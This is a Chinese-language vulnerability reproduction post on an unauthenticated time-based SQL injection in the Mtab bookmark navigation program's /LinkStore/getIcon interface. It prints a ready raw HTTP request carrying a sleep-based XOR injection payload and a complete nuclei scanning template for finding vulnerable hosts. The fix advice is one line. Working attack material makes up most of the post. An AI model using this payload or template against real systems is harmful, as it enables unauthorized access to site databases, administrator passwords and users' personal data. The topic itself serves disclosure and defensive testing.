0x01 产品简介
Mtab书签导航程序-免费无广告的浏览器书签助手,多端同步、美观易用的在线导航和书签工具,自主研发免费使用,帮助您高效管理网页和应用,提升在线体验。
0x02 漏洞描述
Mtab书签导航程序LinkStore/getlcon接口存在SQL注入漏洞,未经身分验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马进一步获取服务器系统权限。
0x03 影响版本
0x04 搜索语法
FOFA
0x05 漏洞复现
![image-20240812095036642](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240812095036642.png)
漏洞poc
1 2 3 4 5 6 7
| POST /LinkStore/getIcon HTTP/2 Host: ip Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Content-Length: 50
{"url":"'XOR(if(now()=sysdate(),sleep(5),0))XOR'"}
|
nuclei的poc
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39
| id: Mtab-getlcon-sqli
info: name: Mtab书签导航程序getlcon SQL注入 author: admin severity: high tags: sqli,Mtab,mtab,书签导航程序
http: - raw: - | POST /LinkStore/getIcon HTTP/1.1 Host: {{Hostname}} Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Content-Length: 50
{"url":"'XOR(if(now()=sysdate(),sleep(5),0))XOR'"}
- | POST /LinkStore/getIcon HTTP/1.1 Host: {{Hostname}} Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Content-Length: 50
{"url":"'XOR(if(now()=sysdate(),sleep(10),0))XOR'"} matchers-condition: and matchers: - type: word part: body words: - "未查询到相关信息" - type: dsl dsl: - 'duration_1>=5 && duration_1<=7' - 'duration_2>=10 && duration_2<=11'
|
![image-20240812103603461](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240812103603461.png)
0x06 修复建议
关闭接口,或者做授权